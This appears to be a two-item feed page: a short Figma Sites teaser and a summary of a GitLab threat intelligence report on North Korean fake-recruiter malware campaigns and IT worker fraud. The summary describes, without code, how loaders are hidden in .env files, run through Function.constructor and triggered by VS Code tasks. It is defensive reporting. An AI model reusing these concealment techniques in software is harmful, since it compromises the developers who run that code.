2 posts
figma Make your site interactive with code layers Inside Figma Product updates Prototyping Design Motion Tips & inspiration AI News Figma Sites Today we’re launching code layers—a new way to build custom interactions in Figma Sites. There’s no limit to what you can build on the web, b…
gitlab The GitLab Threat Intelligence Team has detailed its efforts to disrupt North Korean (DPRK) cyber campaigns, specifically focusing on "Contagious Interview" malware distribution and fraudulent IT worker schemes. By analyzing internal platform data, GitLab identified that these state-sponsored actors leverage legitimate tools and fake recruitment scenarios to compromise software developers and generate illicit revenue for the regime. The report concludes that while these operations are sophisticated and persistent, proactive monitoring and cross-industry intelligence sharing are essential to mitigating these evolving threats. ### Contagious Interview Mechanics * Threat actors pose as recruiters to trick software developers into executing malicious JavaScript projects under the guise of technical interviews. * The primary goal is to deploy malware families such as BeaverTail and Ottercookie, which facilitate credential theft and provide remote control of the victim's device. * A notable evolution in tradecraft includes the use of "ClickFix," a compiled BeaverTail variant identified in late 2025. * Malicious repositories often use a specific execution pattern where base64-encoded URLs and secret headers are hidden within `.env` files, masquerading as benign configuration variables. * To execute the payload, actors utilize `Function.constructor` to load strings as executable code, often triggered by custom error handlers designed to source remote content. ### 2025 Campaign Trends and Infrastructure * GitLab banned 131 unique accounts linked to these campaigns in 2025, with activity peaking in September and averaging 11 bans per month. * Nearly 90% of malicious accounts were created using Gmail addresses, and actors typically accessed the platform through consumer VPNs or dedicated VPS infrastructure. * In more than 80% of cases, malware payloads were not stored on GitLab. Instead, actors used concealed loaders to fetch content from legitimate hosting services, most commonly Vercel. * Recent tactics include the creation of malicious NPM dependencies immediately before use and the exploitation of VS Code tasks to pipe remote content into native shells. ### IT Worker Campaigns and Sanctions Evasion * Beyond malware distribution, DPRK actors use GitLab to support "IT worker" cells that generate revenue and evade international sanctions. * One identified pipeline involved the creation of at least 135 synthetic identities, automated to generate professional connections and contact leads at scale. * Threat actors have been observed adding their own images to stolen U.S. identity documents to bypass employment verification processes. * Forensic analysis revealed financial records from cell managers detailing revenue proceeds from 2022 through 2025, often earned while operating from locations like Moscow, Russia. Organizations should remain vigilant against recruitment-themed social engineering and scrutinize unexpected requests to run external code. GitLab recommends that the security community use the provided indicators of compromise to update defensive posture, as these actors continue to refine their ability to hide malicious intent within legitimate development workflows.